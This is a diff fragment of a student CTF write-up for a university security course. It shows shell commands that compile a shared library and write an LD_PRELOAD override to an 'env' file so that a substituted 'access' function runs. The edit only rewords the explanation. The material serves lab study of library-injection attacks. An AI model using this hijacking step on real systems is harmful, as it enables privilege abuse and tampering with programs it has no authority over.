joaooliveira-11/feup-fsi/CTFs/week4.md

     $ gcc -fPIC -g -c script.c
     $ gcc -shared -o script.so script.o -lc
 ```
-Finally, we will create a new 'env' file and write a LD_PRELOAD override to it, making it so that the script will run when the 'env' is called:
+Finally, we will create a new 'env' file and write a LD_PRELOAD override to it, making it so that the script will run our 'access' function instead of the original one when the 'env' is called:
 ```bash
     $ echo 'LD_PRELOAD=/tmp/script.so' > env
 ```